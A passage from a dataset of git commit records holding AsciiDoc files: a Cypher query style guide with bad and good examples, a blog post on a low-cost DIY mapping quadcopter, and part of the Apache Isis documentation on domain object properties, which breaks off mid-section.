cypher]\n----\nMATCH (n) WHERE n.name CONTAINS 's' RETURN n.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (n)\nWHERE n.name CONTAINS 's'\nRETURN n.name\n----\n\n.. Indent subclauses `ON CREATE` and `ON MATCH` with two spaces.\n+\n.Bad\n[source, cypher]\n----\nMERGE (n) ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\nON CREATE SET a.name = 'me'\nON MATCH SET b.name = 'you'\n----\n+\n.Good\n[source, cypher]\n----\nMERGE (n)\n ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\n ON CREATE SET a.name = 'me'\n ON MATCH SET b.name = 'you'\n----\n\n.. Put `ON CREATE` before `ON MATCH` if both are present.\n\/\/ no example necessary\n\n. Write keywords in upper case.\n+\n.Bad\n[source, cypher]\n----\nmatch (p:Person)\nwhere p.name starts with 'Ma'\nreturn p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person)\nWHERE p.name STARTS WITH 'Ma'\nRETURN p.name\n----\n\n. Write labels in camel case, starting with an upper case character.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:editor-in-chief)-->(:employee)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:EditorInChief)-->(:Employee)\nRETURN e.name\n----\n\n. Prefer single nouns for labels.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:IsEmployed)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:Employee)\nRETURN e.name\n----\n\n. Write relationship types in upper case, using underscore to separate words.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-[own:owns-vehicle]->(:Car)\nRETURN own.since\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-[own:OWNS_VEHICLE]->(:Car)\nRETURN own.since\n----\n\n. Use camel case, starting with a lower case character, for:\n.. functions\n.. properties\n.. variables\n.. 
parameters\n+\n.Bad\n[source, cypher]\n----\nCREATE (N {Prop: 0})\nWITH RAND() AS Rand, {param} AS MAP\nRETURN Rand, MAP.property_key, Count(N)\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (n {prop: 0})\nWITH rand() AS rand, {param} AS map\nRETURN rand, map.propertyKey, count(n)\n----\n\n. Use single quotes (Unicode character U+0027: ') for literal string values.\n+\n.Bad\n[source, cypher]\n----\nRETURN \"Cypher\"\n----\n+\n.Good\n[source, cypher]\n----\nRETURN 'Cypher'\n----\n\n. *Spacing*\n.. For literal maps:\n... No space between the opening brace and the first key\n... No space between key and colon\n... One space between colon and value\n... No space between value and comma\n... One space between comma and next key\n... No space between the last value and the closing brace\n+\n.Bad\n[source, cypher]\n----\nWITH { key1 :'value' ,key2 : 42 } AS map\nRETURN map\n----\n+\n.Good\n[source, cypher]\n----\nWITH {key1: 'value', key2: 42} AS map\nRETURN map\n----\n\n.. No padding space for parameters.\n+\n.Bad\n[source, cypher]\n----\nRETURN { param }\n----\n+\n.Good\n[source, cypher]\n----\nRETURN {param}\n----\n\n.. One space between label\/type predicates and property predicates in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (p:Person{property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person {property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n\n.. No space in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person) --> (:Vehicle)\nRETURN count(*)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(:Vehicle)\nRETURN count(*)\n----\n\n.. Use a wrapping space around operators.\n+\n.Bad\n[source, cypher]\n----\nMATCH p=(s)-->(e)\nWHERE s.name<>e.name\nRETURN length(p)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH p = (s)-->(e)\nWHERE s.name <> e.name\nRETURN length(p)\n----\n\n.. No space in label predicates.\n+\n.Bad\n[source, cypher]\n----\nMATCH (person : Person : Owner )\nRETURN person.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person:Person:Owner)\nRETURN person.name\n----\n\n.. Use a space after each comma in lists and enumerations.\n+\n.Bad\n[source, cypher]\n----\nMATCH (),()\nWITH ['a','b',3.14] AS list\nRETURN list,2,3,4\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (), ()\nWITH ['a', 'b', 3.14] AS list\nRETURN list, 2, 3, 4\n----\n\n. When patterns wrap lines, break after arrows, not before.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\n <--(:Country)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--\n (:Country)\nRETURN count(vehicle)\n----\n\n. Surround node patterns with parentheses.\n.. This only concerns old Cypher code, as omitting parentheses is no longer legal in Cypher.\n+\n.Bad\n[source, cypher]\n----\nMATCH person-->vehicle\nRETURN person, vehicle\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person)-->(vehicle)\nRETURN person, vehicle\n----\n\n. Avoid having to use back-ticks to escape characters and keywords.\n+\n.Bad\n[source, cypher]\n----\nMATCH (`odd-ch@racter$`:`Spaced Label` {`&property`: 42})\nRETURN labels(`odd-ch@racter$`)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (node:NonSpacedLabel {property: 42})\nRETURN labels(node)\n----\n\n. *Patterns*:\n.. 
Use anonymous nodes and relationships when the variable would not be used.\n+\n.Bad\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (b:End {prop: 3}),\n (c:Begin {prop: id(a)})\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (:End {prop: 3}),\n (:Begin {prop: id(a)})\n----\n\n.. Chain patterns together to avoid repeating variables.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car), (vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n\n.. Put named nodes before anonymous nodes.\n+\n.Bad\n[source, cypher]\n----\nMATCH ()-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--()\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Keep anchor nodes at the beginning of the `MATCH` clause.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--(:Person)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Prefer outgoing (left to right) pattern relationships to incoming pattern relationships.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Country)-->(:Company)<--(vehicle:Car)<--(:Person)\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--(:Country)\nRETURN vehicle.mileage\n----\n","old_contents":"= The Cypher Style Guide\n\nStyle guide for writing Cypher code.\n\nNOTE: Cypher is a language.\nLanguages have their own rules, and are not eager to adapt to circumstance.\nRemember not to be too eager to shiv a Cypher expression into the conventions of a different language.\n\n== Why Is Style Important?\n\nConsider this dadaist work of art from Nigel Small and Nicole White:\n\n.Insane query\n[source, cypher]\n----\nMATCH (null)-[:merge]->(true)\nwith null.delete as foreach, `true`.false as null\nreturn 2 + foreach, coalesce(null, 3.1415)\nlimit 10;\n----\n\nThen compare it to this classical piece by Mark Needham:\n\n.Sane query\n[source, cypher]\n----\nMATCH (member:Member {name: 'Mark Needham'})\n -[:HAS_MEMBERSHIP]->()-[:OF_GROUP]->(:Group)-[:HAS_TOPIC]->(topic)\nWITH member, topic, count(*) AS score\nMATCH (topic)<-[:HAS_TOPIC]-(otherGroup:Group)\nWHERE NOT (member)-[:HAS_MEMBERSHIP]->(:Membership)-[:OF_GROUP]->(otherGroup)\nRETURN otherGroup.name, collect(topic.name), sum(score) AS score\nORDER BY score DESC\n----\n\n== Rules\n\nWhenever two rules are in conflict, use the order to decide which one trumps.\n\n\/\/ Template:\n\/\/. rule\n\/\/+\n\/\/.Bad\n\/\/[source, cypher]\n\/\/----\n\/\/MATCH (person:Person {property: value})\n\/\/----\n\/\/.. No padding space for parameters.\n\/\/+\n\/\/.Good\n\/\/[source, cypher]\n\/\/----\n\/\/WITH { param } AS value\n\/\/----\n\n. Start a new clause on a new line.\n+\n.Bad\n[source, cypher]\n----\nMATCH (n) WHERE n.name CONTAINS 's' RETURN n.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (n)\nWHERE n.name CONTAINS 's'\nRETURN n.name\n----\n\n.. 
Indent subclauses `ON CREATE` and `ON MATCH` with two spaces.\n+\n.Bad\n[source, cypher]\n----\nMERGE (n) ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\nON CREATE SET a.name = 'me'\nON MATCH SET b.name = 'you'\n----\n+\n.Good\n[source, cypher]\n----\nMERGE (n)\n ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\n ON CREATE SET a.name = 'me'\n ON MATCH SET b.name = 'you'\n----\n\n.. Put `ON CREATE` before `ON MATCH` if both are present.\n\/\/ no example necessary\n\n. Write keywords in all caps.\n+\n.Bad\n[source, cypher]\n----\nmatch (p:Person)\nwhere p.name starts with 'Ma'\nreturn p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person)\nWHERE p.name STARTS WITH 'Ma'\nRETURN p.name\n----\n\n. Write labels in camel case, starting with an upper case character.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:editor-in-chief)-->(:employee)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:EditorInChief)-->(:Employee)\nRETURN e.name\n----\n\n. Prefer single nouns for labels.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:IsEmployed)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:Employee)\nRETURN e.name\n----\n\n. Write relationship types in all caps, using underscore to separate words.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-[own:owns-vehicle]->(:Car)\nRETURN own.since\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-[own:OWNS_VEHICLE]->(:Car)\nRETURN own.since\n----\n\n. Use camel case, starting with a lower case character, for:\n.. functions\n.. properties\n.. variables\n.. parameters\n+\n.Bad\n[source, cypher]\n----\nCREATE (N {Prop: 0})\nWITH RAND() AS Rand, {param} AS MAP\nRETURN Rand, MAP.property_key, Count(N)\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (n {prop: 0})\nWITH rand() AS rand, {param} AS map\nRETURN rand, map.propertyKey, count(n)\n----\n\n. Use single quotes (Unicode character U+0027: ') for literal string values.\n+\n.Bad\n[source, cypher]\n----\nRETURN \"Cypher\"\n----\n+\n.Good\n[source, cypher]\n----\nRETURN 'Cypher'\n----\n\n. *Spacing*\n.. For literal maps:\n... No space between opening brace and first key\n... No space between key and colon\n... One space between colon and value\n... No space between value and comma\n... One space between comma and next key\n... No space between last value and closing brace\n+\n.Bad\n[source, cypher]\n----\nWITH { key1 :'value' ,key2 : 42 } AS map\nRETURN map\n----\n+\n.Good\n[source, cypher]\n----\nWITH {key1: 'value', key2: 42} AS map\nRETURN map\n----\n\n.. No padding space for parameters.\n+\n.Bad\n[source, cypher]\n----\nRETURN { param }\n----\n+\n.Good\n[source, cypher]\n----\nRETURN {param}\n----\n\n.. One space between label\/type predicates and property predicates in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (p:Person{property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person {property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n\n.. No space in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person) --> (:Vehicle)\nRETURN count(*)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(:Vehicle)\nRETURN count(*)\n----\n\n.. Use wrapping space around operators.\n+\n.Bad\n[source, cypher]\n----\nMATCH p=(s)-->(e)\nWHERE s.name<>e.name\nRETURN length(p)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH p = (s)-->(e)\nWHERE s.name <> e.name\nRETURN length(p)\n----\n\n.. 
No space in label predicates.\n+\n.Bad\n[source, cypher]\n----\nMATCH (person : Person : Owner )\nRETURN person.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person:Person:Owner)\nRETURN person.name\n----\n\n.. Use space after each comma in lists and enumerations.\n+\n.Bad\n[source, cypher]\n----\nMATCH (),()\nWITH ['a','b',3.14] AS list\nRETURN list,2,3,4\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (), ()\nWITH ['a', 'b', 3.14] AS list\nRETURN list, 2, 3, 4\n----\n\n. When patterns wrap lines, break after arrows, not before.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\n <--(:Country)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--\n (:Country)\nRETURN count(vehicle)\n----\n\n. Surround node patterns with parentheses.\n.. This only concerns old Cypher code, as it is no longer legal Cypher to omit parentheses.\n+\n.Bad\n[source, cypher]\n----\nMATCH person-->vehicle\nRETURN person, vehicle\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person)-->(vehicle)\nRETURN person, vehicle\n----\n\n. Avoid having to use back-ticks to escape characters and keywords.\n+\n.Bad\n[source, cypher]\n----\nMATCH (`odd-ch@racter$`:`Spaced Label` {`&property`: 42})\nRETURN labels(`odd-ch@racter$`)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (node:NonSpacedLabel {property: 42})\nRETURN labels(node)\n----\n\n. *Patterns*:\n.. Leave nodes and relationships anonymous when the variable would not be used.\n+\n.Bad\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (b:End {prop: 3}),\n (c:Begin {prop: id(a)})\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (:End {prop: 3}),\n (:Begin {prop: id(a)})\n----\n\n.. Chain patterns together to avoid repeating variables.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car), (vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n\n.. Put named nodes before anonymous nodes.\n+\n.Bad\n[source, cypher]\n----\nMATCH ()-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--()\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Keep anchor nodes at the beginning of the `MATCH` clause.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--(:Person)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. 
Prefer outgoing (left to right) pattern relationships to incoming.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Country)-->(:Company)<--(vehicle:Car)<--(:Person)\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--(:Country)\nRETURN vehicle.mileage\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dd8c4d19547d8ec61be4aff43b97d12b0bd6570","subject":"Update 2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","message":"Update 2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","new_file":"_posts\/2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","new_contents":"= Low Cost Quadcopter Build for DIY Mapping\n\n\n\ngrassrootsmapping\n\n=== What I want to do\n\nI want to build a programmable aerial mapping vehicle that I can use as an interim testbed to refine various DIY\/Open Source methods that will eventually be included in a related project for an [affordable mapping drone](http:\/\/publiclab.org\/notes\/code4maine\/08-05-2014\/aerial-mapping-drone-for-under-60).\n\nimage::https:\/\/lh3.googleusercontent.com\/-VuFdGoKo3UE\/VcouDCctNRI\/AAAAAAAAWDU\/XHdkf7FCV7A\/s640-Ic42\/Quadannotated.png[]\n\n\nIn addition to testing flight components, the vehicle will also be a testbed for a wide variety of aerial sensors including a low-cost Camera's, LIDAR sensors and GPS.\n\n=== My attempt and results\n\n==== The -$100 Flying Wing\nThis project is an outgrowth of, and a complement to an earlier project that sought to build a fully programmable UAV for under $100. To keep costs down, project parameters stipulated that as much of the aircraft as possible should to be constructed out of standardized, off-the-shelf materials including the electronics which were designed around an Arduino Microcontroller and a Gyro-acceleromoter module extracted from a Ninetendo Wii remote. A flying-wing configuration using recycled foam allowed for further efficiency as it required only one motor and speed controller to remain in the air for longer periods. \n That project is still very much in progress and remains the ultimate goal. However, while I was amazed at how much could be achieved with nothing more than an Arduino pro Mini and a Wiimote, the project reached a critical juncture when it became clear that the 8bit Arduino would not be up to the task of following preprogrammed flight patterns by GPS waypoint. As this capability is central to the task of aerial mapping, the entire project has been forced to go \"back to the drawing board\"...\n\n==== Quadcopter\nAs counter-intuitive as it may seem, the simpler design in this case (the flying wing) turned out to be far more difficult than a more technologically complex design like a quadcopter. In the world of DIY\/Open Source, everything depends on there being enough documentation and support for any particular project. 
As the quadcopter configuration has become the most popular over the last decade, it is far easier to start from scratch as you can depend on there being ample support from other users whenever a problem is encountered.\n\n(In Progress) ","old_contents":"= Low Cost Quadcopter Build for DIY Mapping\n\n\n\ngrassrootsmapping\n\n===What I want to do\n\nI want to build a programmable aerial mapping vehicle that I can use as an interim testbed to refine various DIY\/Open Source methods that will eventually be included in a related project for an [affordable mapping drone](http:\/\/publiclab.org\/notes\/code4maine\/08-05-2014\/aerial-mapping-drone-for-under-60).\n\nimage::https:\/\/lh3.googleusercontent.com\/-VuFdGoKo3UE\/VcouDCctNRI\/AAAAAAAAWDU\/XHdkf7FCV7A\/s640-Ic42\/Quadannotated.png[]\n\n\nIn addition to testing flight components, the vehicle will also be a testbed for a wide variety of aerial sensors including a low-cost Camera's, LIDAR sensors and GPS.\n\n===My attempt and results\n\n====The -$100 Flying Wing\n This project is an outgrowth of, and a complement to an earlier project that sought to build a fully programmable UAV for under $100. To keep costs down, project parameters stipulated that as much of the aircraft as possible should to be constructed out of standardized, off-the-shelf materials including the electronics which were designed around an Arduino Microcontroller and a Gyro-acceleromoter module extracted from a Ninetendo Wii remote. A flying-wing configuration using recycled foam allowed for further efficiency as it required only one motor and speed controller to remain in the air for longer periods. \n That project is still very much in progress and remains the ultimate goal. However, while I was amazed at how much could be achieved with nothing more than an Arduino pro Mini and a Wiimote, the project reached a critical juncture when it became clear that the 8bit Arduino would not be up to the task of following preprogrammed flight patterns by GPS waypoint. As this capability is central to the task of aerial mapping, the entire project has been forced to go \"back to the drawing board\"...\n\nQuadcopter\n As counter-intuitive as it may seem, the simpler design in this case (the flying wing) turned out to be far more difficult than a more technologically complex design like a quadcopter. In the world of DIY\/Open Source, everything depends on there being enough documentation and support for any particular project. 
As the quadcopter configuration has become the most popular over the last decade, it is far easier to start from scratch as you can depend on there being ample support from other users whenever a problem is encountered.\n\n####ALL-IN-ONE\n ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"caf4f74c7281fda1918990af8d7d4c2a8a854172","subject":"Update _ugfun_how-tos_class-structure_properties.adoc","message":"Update _ugfun_how-tos_class-structure_properties.adoc","repos":"estatio\/isis,oscarbou\/isis,apache\/isis,incodehq\/isis,apache\/isis,estatio\/isis,apache\/isis,estatio\/isis,apache\/isis,oscarbou\/isis,apache\/isis,incodehq\/isis,apache\/isis,oscarbou\/isis,incodehq\/isis,estatio\/isis,oscarbou\/isis,incodehq\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugfun_how-tos_class-structure_properties.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugfun_how-tos_class-structure_properties.adoc","new_contents":"[[_ugfun_how-tos_class-structure_properties]]\n= Property\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\nA property is an instance variable of a domain object, of a scalar type, that holds some state about either a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] or a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model].\n\nFor example, a ``Customer``'s `firstName` would be a property, as would the `accountCreationDate` on which they created their account.\nAll properties have at least a \"getter\" method, and most properties also have a \"setter\" method (meaning that they are mutable).\nProperties that do _not_ have a setter method are derived properties, and so are not persisted.\n\nFormally speaking, a property is simply a regular JavaBean getter, returning a scalar value recognized by the framework.\nMost properties (those that are editable\/modifiable) will also have a setter and (if persisted) a backing instance field.\nAnd most properties will also have a number of annotations:\n\n* Apache Isis defines its own `@Property` annotation for capturing domain semantics.\nIt also provides a `@PropertyLayout` for UI hints (though the information in this annotation may instead be provided by a supplementary xref:ugfun.adoc#_ugfun_object-layout[`.layout.xml`] file)\n\n* the properties of domain entities are often annotated with the JDO\/DataNucleus `@javax.jdo.annotations.Column` annotation.\nFor property references, there may be other annotations to indicate whether the reference is bidirectional.\nIt's also possible (using annotations) to define a link table to hold foreign key columns.\n\n* for the properties of view models, JAXB annotations such as 
`@javax.xml.bind.annotation.XmlElement` will be present\n\nApache Isis recognises some of these annotations for JDO\/DataNucleus and JAXB and infers some domain semantics from them (for example, the maximum allowable length of a string property).\n\nSince writing getter and setter methods adds quite a bit of boilerplate, it's common to use link:https:\/\/projectlombok.org\/[Project Lombok] to code generate these methods at compile time (using Java's annotation processor) simply by adding the `@lombok.Getter` and `@lombok.Setter` annotations to the field.\nThe xref:guides\/ugfun.adoc#_ugfun_getting-started_simpleapp-archetype[SimpleApp archetype] uses this approach.\n\n\n[[__ugfun_how-tos_class-structure_properties_value-vs-reference-types]]\n== Value vs Reference Types\n\nProperties can either be value types (strings, int, date and so on) or references to another object (for example, an `Order` referencing the `Customer` that placed it).\n\nFor example, to map a string value type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter \/\/ <1>\nprivate String notes;\n----\n<1> using link:https:\/\/projectlombok.org\/[Project Lombok] annotations to reduce boilerplate\n\nYou could also add the `@Property` annotation if you wished:\n\n[source,java]\n----\n@Property\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nAlthough it is not required in this case (none of its attributes have been set).\n\nOr to map a reference type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate Customer customer;\n----\n\nIt's ok for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] to reference another domain entity, and for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model] to reference both view model and domain entities.\nHowever, it isn't valid for a domain entity to hold a persisted reference to a view model (DataNucleus will not know how to persist that view model).\n\n[NOTE]\n====\nFor further details on mapping associations, see the JDO\/DataNucleus documentation for link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/one_to_many.html[one-to-many] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_one.html[many-to-one] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_many.html[many-to-many] associations, and so on.\n====\n\n
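A minimal sketch of such an association (the `Customer`\/`Order` classes and the `customer` field here are hypothetical, not from this guide, and `Order` is assumed to implement `Comparable<Order>`), using JDO's `mappedBy` attribute:\n\n[source,java]\n----\n\/\/ in Customer (the \"one\" side of the association)\n@javax.jdo.annotations.Persistent(mappedBy=\"customer\")\n@lombok.Getter @lombok.Setter\nprivate SortedSet<Order> orders = new TreeSet<>();\n\n\/\/ in Order (the \"many\" side), a reference back to the owning Customer\n@javax.jdo.annotations.Column(allowsNull=\"false\")\n@lombok.Getter @lombok.Setter\nprivate Customer customer;\n----\n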
\nFor domain entities, the annotations for mapping value types tend to be different for properties vs action parameters, because JDO annotations are only valid on properties.\nThe table in the xref:ugfun.adoc#_ugfun_how-tos_class-structure_properties-vs-parameters[Properties vs Parameters] section provides a handy reference of each.\n\n\n[[__ugfun_how-tos_class-structure_properties_optional-properties]]\n== Optional Properties\n\n(For domain entities) JDO\/DataNucleus' default is that a property is assumed to be mandatory if it is a primitive type (eg `int`, `boolean`), but optional if a reference type (eg `String`, `BigDecimal` etc).\nTo override optionality in JDO\/DataNucleus the `@Column(allowsNull=\"...\")` annotation is used.\n\nApache Isis on the other hand assumes that all properties (and action parameters, for that matter) are mandatory, not optional.\nThese defaults can also be overridden using Apache Isis' own annotations, specifically `@Property(optionality=...)`, or (because it's much less verbose) using `@javax.annotation.Nullable`.\n\nThese different defaults can lead to incompatibilities between the two frameworks.\nTo counteract that, Apache Isis also recognizes and honours JDO's `@Column(allowsNull=...)`.\n\nFor example, you can write:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nrather than the more verbose:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Property(optionality=Optionality.OPTIONAL)\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nThe framework will search for any incompatibilities in optionality (whether specified explicitly or defaulted implicitly) between Isis' defaults and DataNucleus, and refuse to boot if any are found (fail fast).\n\n[[__ugfun_how-tos_class-structure_properties_editable-properties]]\n== Editable Properties\n\nApache Isis provides the capability to allow individual properties to be modified.\nThis is specified using the `@Property(editing=...)` attribute.\n\nFor example:\n\n[source,java]\n----\n@Property(editing = Editing.ENABLED)\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nIf this is omitted then whether editing is enabled or disabled is defined globally, in the `isis.properties` configuration file; see xref:rgcfg.adoc#__rgcfg_configuring-core_isis-objects-editing[reference configuration guide] for further details.\n\n\n[[__ugfun_how-tos_class-structure_properties_ignoring-properties]]\n== Ignoring Properties\n\nBy default Apache Isis will automatically render all properties in the xref:ugvw.adoc[UI] or in the xref:ugvro.adoc[REST API].\nTo get Apache Isis to ignore a property (exclude it from its metamodel), annotate the getter using `@Programmatic`.\n\nSimilarly, you can tell JDO\/DataNucleus to ignore a property using the `@javax.jdo.annotations.NotPersistent` annotation.\nThis is independent of Apache Isis; in other words that property will still be rendered in the UI (unless also annotated with `@Programmatic`).\n\nFor view models, you can tell JAXB to ignore a property using the `@javax.xml.bind.annotation.XmlTransient` annotation.\nAgain, this is independent of Apache Isis.\n\n
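A minimal sketch combining the first two cases (the field names here are illustrative only):\n\n[source,java]\n----\n\/\/ excluded from the Apache Isis metamodel (not rendered), but still persisted by JDO\nprivate String internalCode;\n@Programmatic\npublic String getInternalCode() { return internalCode; }\npublic void setInternalCode(String internalCode) { this.internalCode = internalCode; }\n\n\/\/ rendered in the UI by Apache Isis, but not persisted by JDO\/DataNucleus\n@javax.jdo.annotations.NotPersistent\n@lombok.Getter @lombok.Setter\nprivate String scratchpad;\n----\n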
\n\n[[__ugfun_how-tos_class-structure_properties_derived-properties]]\n== Derived Properties\n\nDerived properties are those with a getter but no setter.\nProvided that the property has not been annotated with `@Programmatic`, these will still be rendered in the UI, but they will be read-only (not editable) and their state will not be persisted.\n\nSubtly different, it is also possible to have non-persisted but still editable properties.\nIn this case you will need a getter and a setter, but with the getter annotated using `@NotPersistent`.\nThe implementation of these getters and setters will most likely persist state using other properties (which might be hidden from view using `@Programmatic`).\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.NotPersistent\n@Property(editing=Editing.ENABLED)\npublic String getAddress() { return addressService.toAddress( getLatLong() ); } \/\/ <1>\npublic void setAddress(String address) { setLatLong(addressService.toLatLong(address)); }\n\n@javax.jdo.annotations.Column\nprivate String latLong;\n@Programmatic\npublic String getLatLong() { return latLong; } \/\/ <2>\npublic void setLatLong(String latLong) { this.latLong = latLong; }\n\n@javax.inject.Inject\nAddressService addressService; \/\/ <3>\n----\n<1> the representation of the address, in human readable form, eg \"10 Downing Street, London, UK\"\n<2> the lat\/long representation of the address, eg \"51.503363;-0.127625\"\n<3> an injected service that can convert to\/from address and latLong.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-strings]]\n== Mapping ``String``s (Length)\n\nBy default JDO\/DataNucleus will map string properties to a `VARCHAR(255)`.\nTo limit the length, use the `@Column(length=...)` annotation.\n\nFor 